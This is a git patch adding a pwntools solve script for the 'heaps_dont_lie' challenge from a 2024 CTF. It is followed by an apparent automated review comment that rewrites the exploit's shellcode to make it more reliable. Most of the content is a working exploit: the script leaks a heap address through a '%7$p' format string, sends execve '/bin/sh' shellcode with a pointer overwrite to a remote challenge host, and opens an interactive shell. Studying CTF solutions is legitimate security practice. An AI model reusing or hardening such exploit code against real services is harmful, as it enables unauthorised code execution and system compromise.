From 8709b54d81ef6823b451ad5990a677b5c64763e2 Mon Sep 17 00:00:00 2001
From: jc
Date: Mon, 18 Nov 2024 19:51:05 +0300
Subject: [PATCH] solve script
---
 p3rf3ctr00t_ctf_2024/heaps_dont_lie/a.py | 34 ++++++++++++++++++++++++
 1 file changed, 34 insertions(+)
 create mode 100644 p3rf3ctr00t_ctf_2024/heaps_dont_lie/a.py
diff --git a/p3rf3ctr00t_ctf_2024/heaps_dont_lie/a.py b/p3rf3ctr00t_ctf_2024/heaps_dont_lie/a.py
new file mode 100644
index 0000000..aadecd6
--- /dev/null
+++ b/p3rf3ctr00t_ctf_2024/heaps_dont_lie/a.py
@@ -0,0 +1,34 @@
+#!/usr/bin/python3
+
+from pwn import *
+import time
+
+context.binary = target = ELF("./heaps_dont_lie", checksec=False)
+# r = process()
+r = remote("94.72.112.248", 1244)
+
+# funcs
+s = lambda a: r.sendline(a)
+ss = lambda a: r.send(a)
+
+# leak
+buf = b"%7$p"
+s(buf)
+r.recvuntil(b"tune : ")
+heap = int(r.recvline().strip(), 16) + 0x850
+log.info("heap: %#x", heap)
+
+# sc
+sc = """
+lea rdi, [rdx+19]
+xor rsi, rsi
+xor rdx, rdx
+mov rax, 59
+syscall
+"""
+sc = asm(sc) + b"/bin/sh\0"
+sc += b"A"*(32-len(sc))
+sc += p64(heap)
+s(sc)
+
+r.interactive()
\ No newline at end of file
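Review bot: The shellcode's `lea rdi, [rdx+19]` hard-codes two things the script never checks: that rdx still points at the start of the sent buffer when control lands there (inferred from the code, not visible here), and that the five instructions above it assemble to exactly 19 bytes so `/bin/sh\0` sits at that offset — the 19 matches the GNU-as encoding pwntools emits for `mov rax, 59`, but a different encoding (e.g. `mov eax, 59`, 5 bytes) or a clobbered rdx silently points rdi at garbage. A rip-relative label removes both fragilities by keeping the string inside the assembled blob and letting the assembler compute the offset. The padding line `sc += b"A"*(32-len(sc))` also goes quiet if the blob ever exceeds 32 bytes, so `assert len(sc) <= 32, len(sc)` before `sc += p64(heap)` would catch the overflow-of-the-overflow instead of corrupting the 8-byte pointer that follows. The `+ 0x850` applied to the `%7$p` leak is presumably the distance from the printed heap pointer to the buffer — a comment such as `# offset from leaked heap pointer to our buffer (found in gdb)` would save the next reader a debugger session. `import time`, `target` and the `ss` lambda are unused and can go.
```python
# … unchanged: connection and leak …
sc = asm("""
lea rdi, [rip+binsh]
xor rsi, rsi
xor rdx, rdx
mov rax, 59
syscall
binsh: .string "/bin/sh"
""")
assert len(sc) <= 32, len(sc)  # stay inside the 32-byte buffer; p64(heap) must land right after it
sc += b"A" * (32 - len(sc))
sc += p64(heap)
s(sc)
```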